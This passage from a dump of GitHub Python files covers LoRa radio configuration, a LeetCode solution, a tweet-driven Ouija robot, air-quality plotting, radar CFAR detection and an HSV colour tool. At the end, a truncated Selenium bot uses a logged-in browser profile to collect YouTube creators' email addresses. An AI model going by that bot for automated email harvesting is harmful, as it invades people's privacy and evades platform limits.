\"4/5\"\n    FOUR_SIXTHS = \"4/6\"\n    FOUR_SEVENTHS = \"4/7\"\n    FOUR_EIGHTS = \"4/8\"\n\n\n@dataclass\nclass RadioParameters:\n\n    \"\"\"\n    Represents a collection of parameters for the RN2483 radio settings.\n\n    modulation: The modulation type.\n    frequency: The frequency in Hz.\n    power: The 15th state has an output power of 14.1dBm for 868MHz and 13.6dBm for 433MHz.\n    spread_factor: Higher spreading factor means slower transmissions, but the system will have better reception and less\n    error.\n    coding_rate: The ratio of actual data to error-correcting data.\n    bandwidth: The bandwidth allocated to the transmission.\n    preamble_len: The length of the transmission used to synchronize the receiver.\n    cyclic_redundancy: Enable or disable the cyclic redundancy check used to detect errors in the received signal.\n    iqi: Invert IQ function enabled/disabled.\n    sync_word: The radio sync word.\n    \"\"\"\n\n    modulation: ModulationModes = ModulationModes.LORA\n    frequency: int = 433_050_000\n    power: int = 15\n    spread_factor: int = 9\n    coding_rate: CodingRates = CodingRates.FOUR_SEVENTHS\n    bandwidth: int = 500\n    preamble_len: int = 6\n    cyclic_redundancy: bool = True\n    iqi: bool = False\n    sync_word: str = \"0x43\"\n\n    def __post_init__(self):\n        if self.frequency not in range(*LF_RANGE) and self.frequency not in range(*HF_RANGE):\n            raise ValueError(\n                f\"Frequency '{self.frequency}' not in low frequency range {LF_RANGE} or high frequency range {HF_RANGE}\"\n            )\n\n        if self.power not in range(*POWER_RANGE):\n            raise ValueError(f\"Power '{self.power}' not within allowed range {POWER_RANGE}\")\n\n        if self.spread_factor not in VALID_SPREADING_FACTORS:\n            raise ValueError(f\"Spread factor '{self.spread_factor}' invalid; must be one of {VALID_SPREADING_FACTORS}\")\n\n        if self.preamble_len not in range(*PREAMBLE_RANGE):\n            raise ValueError(f\"Preamble length '{self.preamble_len}' not within allowed range of {PREAMBLE_RANGE}\")\n\n        if int(self.sync_word, 16) not in range(*SYNC_RANGE):\n            raise ValueError(f\"Sync word '{self.sync_word}' not within allowed range of {SYNC_RANGE}\")\n        self.sync_word = self.sync_word[2:]  # Remove 0x\n\n    @classmethod\n    def from_json(cls, data: JSON) -> Self:\n        \"\"\"Builds a new RadioParameters object from JSON data found in a config file.\"\"\"\n\n        # Radio parameters are either initialized with an explicitly defined value from the config file, or\n        # are assigned a default value.\n        return cls(\n            modulation=ModulationModes(data.get(\"modulation\", \"lora\")),\n            frequency=data.get(\"frequency\", 433_050_000),\n            power=data.get(\"power\", 15),\n            
spread_factor=data.get(\"spread_factor\", 9),\n coding_rate=CodingRates(data.get(\"coding_rate\", \"4/7\")),\n bandwidth=data.get(\"bandwidth\", 500),\n preamble_len=data.get(\"preamble_len\", 6),\n cyclic_redundancy=data.get(\"cyclic_redundancy\", True),\n iqi=data.get(\"iqi\", False),\n sync_word=data.get(\"sync_word\", \"0x43\"),\n )\n\n def __iter__(self):\n yield \"modulation\", self.modulation.value\n yield \"frequency\", self.frequency\n yield \"power\", self.power\n yield \"spread_factor\", self.spread_factor\n yield \"coding_rate\", self.coding_rate.value\n yield \"bandwidth\", self.bandwidth\n yield \"preamble_len\", self.preamble_len\n yield \"cyclic_redundancy\", self.cyclic_redundancy\n yield \"iqi\", self.iqi\n yield \"sync_word\", self.sync_word\n\n\n@dataclass\nclass Config:\n\n \"\"\"Contains settings for the ground station process.\"\"\"\n\n radio_parameters: RadioParameters = field(default_factory=RadioParameters)\n approved_callsigns: dict[str, str] = field(default_factory=dict)\n\n def __post_init__(self):\n if len(self.approved_callsigns) == 0:\n raise ValueError(\"You must provide at least one approved callsign.\")\n\n @classmethod\n def from_json(cls, data: JSON) -> Self:\n \"\"\"Creates a new Config object from the JSON data contained in the user config file.\"\"\"\n\n return cls(\n radio_parameters=RadioParameters.from_json(data.get(\"radio_params\", dict())), # type:ignore\n approved_callsigns=data.get(\"approved_callsigns\", dict()), # type:ignore\n )\n\n\ndef load_config(filepath: str) -> Config:\n \"\"\"Returns a Config object created from a configuration JSON file.\"\"\"\n\n with open(filepath, \"r\") as file:\n data = json.load(file)\n\n return Config.from_json(data)\n", "repo_name": "CarletonURocketry/ground-station", "sub_path": "modules/misc/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 5491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 23, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Self", "line_number": 89, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 39, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 125, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 126, "usage_type": "call"}, {"api_name": "typing.Self", "line_number": 133, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 120, "usage_type": "name"}, {"api_name": "json.load", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "13277964412", "text": "import collections\nimport copy\nclass Solution(object):\n    def findSubstring(self, s, words):\n        \"\"\"\n        :type s: str\n        :type words: List[str]\n        :rtype: List[int]\n        \"\"\"\n        if not words: return []\n        finW = collections.defaultdict(int)\n        cnt = len(words)\n        wl = len(words[0])\n        for w in words:\n            finW[w] += 1\n            if len(w) != wl: return []\n        res = []\n        for i in range(0, wl): # matches may start at any offset modulo wl\n            k = i\n            j = i\n            dicW = collections.defaultdict(int)\n            count = 0\n            while j <= len(s) - wl:\n                ss = s[j:j + wl]\n                if ss in finW:\n                    dicW[ss] += 1\n                    if dicW[ss] <= finW[ss]:\n                        count += 1\n                    else: # too many copies of ss; move k forward to erase\n                        while dicW[ss] > finW[ss]:\n                            # advance k, discarding words (better to drop than to keep too many)\n                            ss1 = s[k:k + wl]\n                            dicW[ss1] -= 1\n                            if dicW[ss1] < finW[ss1]: count -= 1\n                            k += wl\n                    if count == cnt:\n                        # found a full concatenation starting at k\n                        res.append(k)\n                        dicW[s[k:k + wl]] -= 1\n                        count -= 1\n                        k += wl\n                else: # not a word; reset the window\n                    dicW = collections.defaultdict(int)\n                    count = 0\n                    k = j + wl\n                j += wl\n        return res\n\nprint(Solution().findSubstring(\"abaababbaba\", [\"ba\",\"ab\",\"ab\"]))\nprint(Solution().findSubstring(\"barfoogfoobarthefoobarman\", [\"bar\",\"foo\",\"the\"]))\nprint(Solution().findSubstring('foobarthebarfooman', ['foo', 'bar']))\nprint(Solution().findSubstring(\"wordgoodgoodgoodbestword\", [\"word\",\"good\",\"best\",\"good\"]))\n# print(Solution().findSubstring(\"lingmindraboofooowingdingbarrwingmonkeypoundcake\", [\"fooo\",\"barr\",\"wing\",\"ding\",\"wing\"]))", "repo_name": "SuperMartinYang/learning_algorithm", "sub_path": "leetcode/hard/Substring_with_Concatenation_of_All_Words.py", "file_name": "Substring_with_Concatenation_of_All_Words.py", "file_ext": "py", "file_size_in_byte": 2055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 21, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "32933856372", "text": "#!/usr/bin/env python\n\nimport os\nimport tweepy\nimport Queue\nimport threading\nimport json\nfrom sets import Set\nfrom time import sleep\n\nerr = False\nif not \"TWITTER_CONSUMER_KEY\" in os.environ:\n print(\"Environment variable TWITTER_CONSUMER_KEY not set!\")\n err = True\nelse:\n consumer_key = os.environ.get(\"TWITTER_CONSUMER_KEY\", \"\")\n\nif not \"TWITTER_CONSUMER_SECRET\" in os.environ:\n print(\"Environment variable TWITTER_CONSUMER_SECRET not set!\")\n err = True\nelse:\n consumer_secret = os.environ.get(\"TWITTER_CONSUMER_SECRET\", \"\")\n\nif not \"TWITTER_OAUTH_TOKEN\" in os.environ:\n print(\"Environment variable TWITTER_OAUTH_TOKEN not set!\")\n err = True\nelse:\n oauth_token = os.environ.get(\"TWITTER_OAUTH_TOKEN\", \"\")\n\nif not \"TWITTER_OAUTH_SECRET\" in os.environ:\n print(\"Environment variable TWITTER_OAUTH_SECRET not set!\")\n err = True\nelse:\n oauth_secret = os.environ.get(\"TWITTER_OAUTH_SECRET\", \"\")\n\ntwitter_track = os.environ.get(\"TWITTER_TRACK\")\nif not \"TWITTER_TRACK\" in os.environ:\n print(\"WARNING: Environment variable TWITTER_TRACK not set; nothing will be streamed!\")\nelse:\n print(\"Tracking\", twitter_track)\n\nif not err:\n try:\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(oauth_token, oauth_secret)\n except:\n print(\"Could not set API tokens\")\n err = True\n\nif not err:\n try:\n api = tweepy.API(auth)\n except:\n print(\"Could not authenticate with Twitter\")\n err = True\n\nif err:\n print(\"ERROR: Twitter API communication failed\")\n while True:\n sleep(100)\n\n\nclass RobotListener(tweepy.StreamListener):\n def on_status(self, status):\n # Filter out retweets because we don't get the full text and there's no real\n # point in going and looking up the original just to print it again -- people\n # should say unique things! :)\n if (not status.retweeted) and ('RT @' not in status.text):\n #print(\"FROM: @\" + status.user.screen_name + \" (\" + status.user.name + \")\")\n #print(\"TEXT: \" + status.text)\n q.put(status)\n #print(q.qsize())\n \n def on_error(self, status_code):\n print(\"ERROR! 
Status code: \", status_code)\n return False\n\ndef robot(letter):\n print(\"ROBOT:\", letter)\n os.system(\"screen -S robot -X stuff '\" + letter + \"^M'\")\n\ndef display_letter(letter):\n #print(\"DISPLAY:\", letter)\n if letter == \"\\n\":\n letter = \" \"\n message = { \"newmessage\": False, \"letter\": letter }\n json.dump(message, fifo)\n fifo.write(\"\\n\")\n fifo.flush()\n\ndef display_new(handle):\n print(\"New tweet from \", handle)\n message = { \"newmessage\": True, \"name\": handle }\n json.dump(message, fifo)\n fifo.write(\"\\n\")\n fifo.flush()\n\ndef twitter_thread():\n print(\"Starting twitter thread\")\n robotListener = RobotListener()\n robot = tweepy.Stream(auth = api.auth, listener = robotListener)\n robot.filter(track=[twitter_track])\n\n\nboard_chars = Set('abcdefghijklmnopqrstuvwxyz0123456789(,@!?:.)')\nq = Queue.Queue()\nfifo = open('messages', 'w')\n\nt = threading.Thread(target=twitter_thread)\nt.daemon = True\nt.start()\n\nwhile True:\n if not q.empty():\n # Grab a tweet and show it\n tweet = q.get()\n display_new(\"@\" + tweet.user.screen_name + \" (\" + tweet.user.name + \")\")\n # We'll show it character by character to allow the robot to move\n for c in tweet.text:\n display_letter(c)\n if Set(c.lower()).issubset(board_chars):\n robot(c.lower())\n sleep(2)\n sleep(5)\n", "repo_name": "mccollam/ouijarobot", "sub_path": "pi/stream.py", "file_name": "stream.py", "file_ext": "py", "file_size_in_byte": 3602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tweepy.OAuthHandler", "line_number": 44, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "tweepy.StreamListener", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 87, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 94, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 101, "usage_type": "call"}, {"api_name": "sets.Set", "line_number": 105, "usage_type": "call"}, {"api_name": "Queue.Queue", "line_number": 106, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 109, "usage_type": "call"}, {"api_name": "sets.Set", "line_number": 121, "usage_type": "call"}, 
{"api_name": "time.sleep", "line_number": 123, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 124, "usage_type": "call"}]}
+{"seq_id": "2883772216", "text": "# coding=utf-8\n\nimport pandas as pd\nimport numpy as np\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nfrom matplotlib import pyplot as plt\n# from matplotlib import font_manager\n\n# my_font = font_manager.FontProperties(fname=\"/usr/share/fonts/truetype/arphic/uming.ttc\") # /usr/share/fonts/truetype/arphic/ukai.ttc\")\n\nfile_path = \"./BeijingPM20100101_20151231.csv\"\ndf = pd.read_csv(file_path)\nprint(df.head(1))\n\n# merge the separate time fields into a pandas period type\nperiod = pd.PeriodIndex(year=df[\"year\"],month=df[\"month\"], day=df[\"day\"],hour=df[\"hour\"], freq=\"H\")\n# print(period)\n# print(type(period))\ndf[\"datetime\"] = period\nprint(df.head(5))\n\ndf.set_index(\"datetime\", inplace=True)\ndf = df.resample(\"7D\").mean()\n# drop rows with missing data\n# print(df[\"PM_US Post\"])\ndata = df[\"PM_US Post\"].dropna()\ndata_china = df[\"PM_Dongsi\"]\n\n# plot\n_x = data.index\n_x = [i.strftime(\"%Y-%m-%d\") for i in _x]\n_x_china = [i.strftime(\"%Y-%m-%d\") for i in data_china.index]\n_y = data.values\n_y_china = data_china.values\n\nplt.figure(figsize=(20, 8), dpi=80)\nplt.plot(range(len(_x)), _y, label=\"US_POST\")\nplt.plot(range(len(_x)), _y_china, label=\"CN_POST\")\nplt.xticks(range(len(_x))[::5], _x[::5], rotation=90)\nplt.legend(loc=\"best\")\nplt.grid(alpha=0.4, linestyle=\":\")\nplt.show()\n\n", "repo_name": "00lab/AI-Lab", "sub_path": "21数据分析/21源码/28_合并时间_PM2.5案例.py", "file_name": "28_合并时间_PM2.5案例.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.setdefaultencoding", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.PeriodIndex", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "10139990732", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef awgn(x,snr):\r\n    snr = 10**(snr/10.0)\r\n    xpower = np.sum(x**2)\r\n    mu = 0\r\n    npower = xpower/snr\r\n    sigma = np.sqrt(npower)\r\n    return np.random.normal(mu,sigma,size=len(x)),sigma\r\n\r\nN = 200\r\ns = np.zeros(N)\r\nsig_db = 35\r\ns[50] = np.sqrt(10**(sig_db/10.0))\r\n[w1,sigma] = awgn(s,5) ####this w is constant if awgn is called only once\r\ns1 = s+w1 \r\ntotal = 10*np.log10(np.sum(s1**2)/N)####estimate noise power in dB\r\nprint('noise power(one pulse period) : %ddB'%total)\r\nprint('signal power(one pulse period) : %ddB'%sig_db)\r\n\r\nw0 = np.zeros((N,10))\r\nfor k in range(10):\r\n    [w,sigma] = awgn(s,5)\r\n    w0[:,k] = w\r\n\r\ns0 = np.concatenate((s+w0[:,0],s+w0[:,1],s+w0[:,2],s+w0[:,3],s+w0[:,4],s+w0[:,5],s+w0[:,6],s+w0[:,7],s+w0[:,8],s+w0[:,9]))##this just generates the same sequence\r\nsc0 = np.zeros(N)\r\n\r\n\r\nfor j in range(10):\r\n    sc0 = sc0 + s0[j*N:(j+1)*N]\r\n\r\nsc = sc0\r\n#sc = s+w ###this for no accumulation\r\nfig1 = plt.figure()\r\nplt.plot(10*np.log10(s1**2),label='one period clutter')\r\nplt.ylabel('Amplitude/dB')\r\nplt.xlabel('range')\r\nfig1.show()\r\n\r\n####cfar####\r\n#sc = sc**2\r\npfa = 1e-4\r\ng = 2\r\nr = 10\r\nn = 2*r\r\nr_cell = np.zeros(n)\r\ntest = np.zeros(N)\r\ntest_ideal = np.zeros(N)\r\nsig_loc = np.zeros(N)\r\nsigma0 = sigma**2\r\n\r\nfor i in range(N):\r\n    if i-g-r>=0 and i+g+r<=N-1:\r\n        r_cell = np.concatenate((sc[i-g-r:i-g-1],sc[i+g+1:r+i+g]))\r\n        \r\n        sigma2_e = np.sum(r_cell**2)/n\r\n        #print(sigma2_e)\r\n        a_temp = pfa**(-1/n)\r\n        alpha = n*(a_temp-1)\r\n        alpha0 = -np.log(pfa)\r\n        #print(alpha)\r\n        test_ideal[i] = alpha0*sigma0 ###sigma appears in square not in db,10sigma\r\n        test[i] = alpha*sigma2_e\r\n        #test[i] = sigma2_e\r\n        if test[i]<sc[i]**2 and i-g-r>=0 and i+g+r<=N-1:\r\n            sig_loc[i]=1\r\n\r\nfig2 = plt.figure()\r\n\r\nplt.plot(10*np.log10(sc**2),'r-',label='signal with white gaussian noise')\r\nplt.ylabel('Amplitude/dB')\r\nplt.xlabel('range')\r\nplt.legend(loc='lower right')\r\nplt.hold(True)\r\n#plt.plot(test,'b-')\r\nplt.plot(10*np.log10(test),'b-.',label='the adaptive threshold')\r\nplt.legend(loc='lower right')\r\nplt.hold(False)\r\nfig2.show()\r\n\r\nfig3 = plt.figure()\r\n\r\nplt.plot(sig_loc,label='the estimate location')\r\nplt.legend(loc='upper right')\r\nplt.xlabel('range')\r\nfig3.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "jensonlin/SomeRadarDetectProgram", "sub_path": "phaseaccumulate.py", "file_name": "phaseaccumulate.py", "file_ext": "py", "file_size_in_byte": 2292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.sum", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 36, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hold", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hold", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}]}
+{"seq_id": "31714013910", "text": "import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('configure MinMax HSV')\n\ndef nothing(x):\n    pass\n\nerode_dilate_kernel = np.ones((5,5), np.uint8)\nHSV_minmax = ['HMin','SMin','VMin','HMax','SMax','VMax']\nvalue = [179,255,255,179,255,255]\n\nfor string,val in zip(HSV_minmax,value):\n    cv2.createTrackbar(string, 'configure MinMax HSV', 0, val,nothing)\n    \ncv2.setTrackbarPos('HMax', 'configure MinMax HSV', 179)\ncv2.setTrackbarPos('SMax', 'configure MinMax HSV', 255)\ncv2.setTrackbarPos('VMax', 'configure MinMax HSV', 255)\n\n# Initialize HSV min/max values\nhMin = sMin = vMin = hMax = sMax = vMax = 0\n\n\nwhile True:\n    _,frame = cap.read()\n    frame = cv2.resize(frame,(650,500))\n    blurred = cv2.GaussianBlur(frame, (15,15),0)\n    hsv = cv2.cvtColor(blurred,cv2.COLOR_BGR2HSV)\n\n    hMin = cv2.getTrackbarPos('HMin', 'configure MinMax HSV')\n    sMin = cv2.getTrackbarPos('SMin', 'configure MinMax HSV')\n    vMin = cv2.getTrackbarPos('VMin', 'configure MinMax HSV')\n    hMax = cv2.getTrackbarPos('HMax', 'configure MinMax HSV')\n    sMax = cv2.getTrackbarPos('SMax', 'configure MinMax HSV')\n    vMax = cv2.getTrackbarPos('VMax', 'configure MinMax HSV')\n    \n    lower = np.array([hMin, sMin, vMin])\n    upper = np.array([hMax, sMax, vMax])\n    \n    mask = cv2.inRange(hsv, lower,upper)\n    mask = cv2.erode(mask,erode_dilate_kernel,iterations=2)\n    mask = cv2.dilate(mask,erode_dilate_kernel,iterations=2)\n\n    \n    #cv2.imshow(\"main frame\",frame)\n    cv2.imshow(\"mask\",mask)\n    cv2.imshow(\"blur\",blurred)\n\n    if cv2.waitKey(1) & 0xff == ord(\"q\"):\n        break\n\n    \nprint(lower,upper)\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "Thehunk1206/Color-detecting-and-tracking", "sub_path": "get_HSV_for_color.py", "file_name": "get_HSV_for_color.py", "file_ext": "py", "file_size_in_byte": 1655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.createTrackbar", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.setTrackbarPos", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.setTrackbarPos", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.setTrackbarPos", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.getTrackbarPos", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 42, "usage_type": "call"}, {"api_name": 
"cv2.erode", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "12127112389", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom threading import Thread, Event\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep\n\nimport os\nfrom dotenv import load_dotenv\n\n\nclass Bot(Thread):\n def __init__(self):\n Thread.__init__(self)\n self._stop = Event()\n self.total_request = 100\n self.today_count = 0\n self.page = 1\n self.setdriver()\n \n def stop(self): \n self._stop.set() \n \n def stopped(self): \n return self._stop.isSet()\n\n def init_task_info(self):\n load_dotenv()\n self.DEFAULT_PROFILE = os.getenv('DEFAULT_PROFILE')\n self.channel_link = \"https://www.youtube.com/c/DanLok/about\"\n\n def setdriver(self):\n try:\n self.init_task_info()\n options = webdriver.FirefoxOptions()\n options.add_argument(\"--start-maximized\")\n # options.headless = True\n profile = webdriver.FirefoxProfile(self.DEFAULT_PROFILE)\n self.driver = webdriver.Firefox(executable_path=\"geckodriver.exe\", options=options, firefox_profile=profile)\n \n except Exception as e:\n print(e)\n \n def close(self):\n try:\n self.driver.quit()\n except Exception as e:\n print(e)\n\n def _next_page(self):\n self.page += 1\n self.driver.get(f'{self.SEARCH_LINK}&page={self.page}')\n print('next page : ', self.page)\n\n def _click_button_with_label(self, label):\n try:\n self.driver.find_element(By.XPATH, f'//button/span[text()=\"{label}\"]').click()\n return True\n except Exception as e:\n print(e)\n return False\n\n\n def get_email(self):\n try:\n WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//tp-yt-paper-button[@id=\"button\"]/*[text()=\"View email address\"]'))).click()\n # view_email_button_ele = self.driver.find_element(By.XPATH, '//tp-yt-paper-button[@id=\"button\"]/*[text()=\"View email address\"]').find_element_by_xpath('..')\n # view_email_button_ele.click()\n print(\"clicked view email button!\")\n WebDriverWait(self.driver, 